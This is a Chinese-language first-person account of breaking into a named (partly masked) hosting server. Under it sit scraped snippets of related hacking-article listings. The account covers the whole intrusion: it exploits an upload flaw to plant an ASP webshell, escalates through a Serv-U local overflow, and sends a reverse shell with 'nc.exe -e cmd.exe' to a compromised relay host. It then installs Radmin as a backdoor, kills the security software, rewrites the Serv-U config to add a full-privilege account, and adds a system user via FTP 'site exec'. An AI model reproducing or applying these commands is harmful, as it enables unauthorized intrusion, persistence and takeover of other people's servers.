首先确定一下目标:http://www.sun***.com ,常见的虚拟主机。利用Upfile的漏洞相信大家获得webshell不难。我们这次获得这个webshell,不是DVBBS,
而是自由动力3.6的软件上传过滤不严。网站http://www.sun***.com/lemon/Index.asp是自由动力3.6文章系统。Xr运用WinHex.exe和WSockExpert.exe上传一个网页木马newmm.asp,用过动鲨的door.exe的人都知道,这个是上传asp木马内容的。
于是,上传海洋2005a,成功获得webshell.测试一下权限,在cmd里运行set,获得主机一些信息,系统盘是D盘,也说明了我们的webshell有运行权限的。那我们看看C盘有什么呢?难道是双系统?浏览后发现没有什么系统文件,只有一些垃圾文件,晕死。没关系,再来检查一下,虚拟主机
都有serv-u的,这台也不例外,是5.0.0.8的。呵呵,是有本地溢出的呀,挖哈哈。思路:上传serv-u本地溢出文件srv.exe和nc.exe利用nc来反连接获得系统shell.大家是不是发现海洋2005a那个上传的组件不好用(反正我总遇到这个问题),没关系,用rain改的一个无组件上传,一共有3个文件,up.htm, upload.asp和uploadclass.asp.upload.asp和uploadclass.asp上传到
同一个文件夹,up.htm是本地用的,修改up.htm里的链接地址为:http://www.sun***.com/lemon/upload.asp就可以上传了。传上了srv.exe和nc.exe在H:longsun***lemon(网站目录)后,发现没有运行权限。没关系,根据经验,一般系统下D:Documents and SettingsAll Users是应该有运行权限的。于是想把文件copy过去,
但是发现我们的webshell没有对D盘写的权限,晕死。可以浏览D:program filesserv-uServUDaemon.ini,不能改,难道要破解serv-u的密码,晕,不想。不可以这么就泄气了,我突然想到为什么系统不放在C盘了,难道C盘是FAT32分区的?(后来证明了我们的想法。这里说一下,如果主机有win98的系统盘,
那里99%是FAT32分区的。我们还遇到过装有Ghost的主机,为了方便在DOS下备份,它的备份盘一般都是FAT分区的。)如果系统盘是FAT32分区,则网站就没有什么安全性可言了。虽然C盘不是系统盘,但是我们有执行权限。呵呵,copy srv.exe和nc.exe到c:,运行 srv.exe “nc.exe –e cmd.exe 202.*.*.* 888”,这里的202.*.*.*是我们的肉鸡,在这之前我们已经在肉鸡上运行了nc –l –p 888.我们在学校内网里,没有公网ip,不爽-ing.我们成功获得一个系统shell连上肉鸡。(看起来简单,其实这里我们也遇到过挫折,我们发现有些版本的nc居然没有-e这个参数,还以为全世界nc功能都一样。后来又发现不同版本的nc互连不成功,会出现乱码,没办法用。为此,上传n次,错误n次,傻了n次,后来
终于成功了。做黑客还真得有耐心和恒心。)高兴之余,我们仍不满足,因为这个shell实在是太慢了。于是,想用我们最常用的Radmin,其实管理员一按Alt+Ctrl+Del,看进程就能发现r_server了,但是还是喜欢用它,
是因为不会被查杀。好了,上传admdll.dll,raddrv.dll,r_server.exe到H:longsun***lemon,再用刚才nc得到的shell把它们copy到d:winntsystem32下,分别运行:r_server /install , net start r_server , r_server /pass:rain /save .一阵漫长的等待,终于显示成功了。兴冲冲用radmin连上去,发现连接失败。晕死,忘了有防火墙了。上传pslist和pskill上去,发现有backice,木马克星等。Kill掉他们虽然可以登陆,但服务器重启后还是不行,终不是长久之计呀。防火墙是不防21,80等端口的,于是,我们的思路又回到了serv-u上了。把他的ServUDaemon.ini下载下来,覆盖本机的ServUDaemon.ini,在本机的serv-u上添加一个用户名为xr,密码为rain的系统帐号,加上所有权限。再用老办法,上传,用shell写入D:program filesserv-u里,覆盖掉原来的ServUDaemon.ini.虽然又等了n长时间,但是成功了,于是用flashfxp连上,发生530错误。郁闷,怎么又失败了。(根据经验这样应该就可以了,但为什么不行没有想通,请高手指点。)不管了,我们重启serv-u就ok了,怎么重启呢,开始想用shutdown重启系统,但那样我们就
失去了nc这个shell,还可能被发现。后来,眼睛一亮,我们不是有pskill吗?刚才用pslist发现有这个进程:ServUDaemon .把它kill了。
然后再运行D:program filesserv-u ServUAdmin.exe ,这里要注意不是ServUDaemon.exe .好了,到这里,我们直接ftp上去吧,ls一下,哈哈,系统盘在我的掌握下。我们能不能运行系统命令呢?是可以的,这样就可以:ftp>quote site exec net user xr rain /add在webshell上运行net user,就可以看见添加成功了。整个入侵渗透到这就结束了,在一阵后清理打扫后。我们就开始讨论了。其实,突破防火墙有很多好的rootkit可以做到的,但是我们觉得系统自带的服务才是最安全的后门。
黑客技术之网络攻击指南
时间: 2024-11-08 18:52:18
黑客技术之网络攻击指南的相关文章
硬件黑客技术——扩展你渗透的攻击面
一.前言 为了充分利用待评估的硬件,您应该熟悉多种安全测试领域--基础设施.网络.移动应用程序--因为这些现代设备都为我们提供了丰富的攻击面.硬件黑客技术可以极大扩展我们的渗透能力,不仅能够带来一些新的攻击方式,同时,还能增加我们的攻击深度. 二.动机 1. 持久性的问题 目前,漏洞的"半衰期"(用户为其服务/软件中已识别的漏洞安装安全补丁所需的时间的一半)已经非常短暂了;对于托管的Web服务来说,可能只有几分钟,即使是维护可执行文件和各种服务所需的时间,也只有几个小时;就算是对于具有
日政府举办首个黑客技术比赛
鉴于日本的中央政府机关以及企业等相继遭到http://www.aliyun.com/zixun/aggregation/10370.html">网络攻击,为了培养能够防御网络攻击的人才,一个关于黑客技术和知识的竞技比赛的决赛今天(3日)在东京举行. 熟知黑客技术但进行防御网络攻击活动的人士被称为"白帽黑客",美国等国正在网罗白帽黑客人才积极发挥他们的作用,但在日本,为了防止有关犯罪活动,迄今为止都没有相关的竞技比赛. 本次是日本政府首次举办的黑客技术比赛,经济产业省为此
Web前端黑客技术揭秘
立即购买:Web前端黑客技术揭秘 内容推荐 Web前端的黑客攻防技术是一门非常新颖且有趣的黑客技术,主要包含Web前端安全的跨站脚本(XSS).跨站请求伪造(CSRF).界面操作劫持这三大类,涉及的知识点涵盖信任与信任关系.Cookie安全.Flash安全.DOM渲染.字符集.跨域.原生态攻击.高级钓鱼.蠕虫思想等,这些都是研究前端安全的人必备的知识点.本书作者深入剖析了许多经典的攻防技巧,并给出了许多独到的安全见解. 媒体评论 <Web前端黑客技术揭秘>是每名Web前端工程师都必备的安全参考
进攻即是最好的防御!19个练习黑客技术的在线网站
进攻即是最好的防御,这句话同样适用于信息安全的世界.这里罗列了19个合法的来练习黑客技术的网站,不管你是一名开发人员.安全工程师.代码审计师.渗透测试人员,通过不断的练习才能让你成为一个优秀安全研究人员.以下网站希望能给各位安全小伙伴带来帮助!若有其他的补充和推荐,欢迎给小编留言(排名不分先后) 国外 1.bWAPP免费和开源的web应用程序安全项目.它有助于安全爱好者及研究人员发现和防止web漏洞. 地址:http://www.itsecgames.com/ 2.Damn Vulnerable
揭秘:《谍影重重5》中都有哪些黑客技术
时隔四年,谍影重重系列再次显影,虽然帕金森氏的手持摄影让影迷们在紧凑的剧情中觉得略为晕眩,但去过火星.种过土豆.会格斗.会飙车的马特·达蒙叔叔依然把妹子们迷的不要不要的.新角色艾丽·西亚维坎德的干练与高超的特工技术也收获了一批迷弟.那<谍影重重5>中的特工技术(也是黑客技术)在现实生活中真的可以实现吗?雷锋网(公众号:雷锋网)来帮你盘一盘. 开盘前先简单介绍下文中会提到的人物关系,杰森·伯恩在一次执行任务中出现了意外,并被当成了中情局的叛逆者,为了保护自己,杰森·伯恩过上了隐姓埋名的
黑客级Kubernetes网络指南
本文讲的是黑客级Kubernetes网络指南[编者的话]作者Yaron Haviv,Iguazio的CTO. 对于集群的要求指标不同,对于Kubernetes网络他们具有自己独特的方法论,此文是系列文章的第一篇,是Iguazio对于Kubernetes网络的一种处理方法说明. [深圳站|3天烧脑式Kubernetes训练营]培训内容包括:Kubernetes概述.架构.日志和监控,部署.自动驾驶.服务发现.网络方案等核心机制分析,进阶篇--Kubernetes调度工作原理.资源管理及源码分析等.
黑客——技术的凝聚者???
(申明:孤剑不是hack,也不愿意做hack,只是技术的追求者;同时孤剑不认识WinKy) 写在前面: 不知道在中国,有多少人能真正的理解什么是hack,当hack被加上商业的成分就失去了本来的色彩,如今多如繁星的大小类黑客站点如雨后春笋般出现,不过是否有技术,统统叫hack,拿着别人的工具去砍掉几个站点就说自己是黑客.每每看到这些心就痛一次,不知道是谁之过错?也许这篇文章才能找到蛛丝马迹! 以下文章来源:http://www.cycycy.net/asp/show.asp?id=
尚未被破解的新型黑客技术!把你的耳机变成窃听麦克风
为了防止被黑客偷窥,谨慎的电脑用户会一小张贴纸盖住摄像头(扎克伯格):神经过敏的还会担心设备上的麦克风:妄想症最严重的甚至会把他们的笔记本电脑和智能手机拆开,把音频组件关闭或者干脆拆下来,这样黑客就别想窃听到任何内容.现在,以色列的一组研究人员把这个监听-反监听的妄想症游戏推到了新高度--他们开发出一个把用户耳机临时变为麦克风,使黑客能对用户进行监听的恶意软件. 以色列本·古里安大学(Ben Gurion University)的研究人员,创造了一组名为"Speaker"(扬声器)的代
黑客网站负责人因培训黑客技术入狱
黑客培训广告.资料图 今年35周岁的王某可能做梦也没想到,曾是一代黑客佼佼者的自己,会在铁窗内度过自己2011年的新年. 2003年5月,王某凭借自己对计算机网络的热爱,成为黑客程序界的高手,成功创建了网址为www.hackbase.com的黑基网,在网站上开展黑客软件的共享,探讨一些技巧.2009年,王某以黑基网为平台,在北京市海淀区成立了黑基公司,自任法人,同时招聘了一批曾在网络安全公司或大型杀毒软件公司供职.具备较高计算机技术,在黑客圈内有一定知名度的人担任网站顾问.专职讲师等.黑基公司的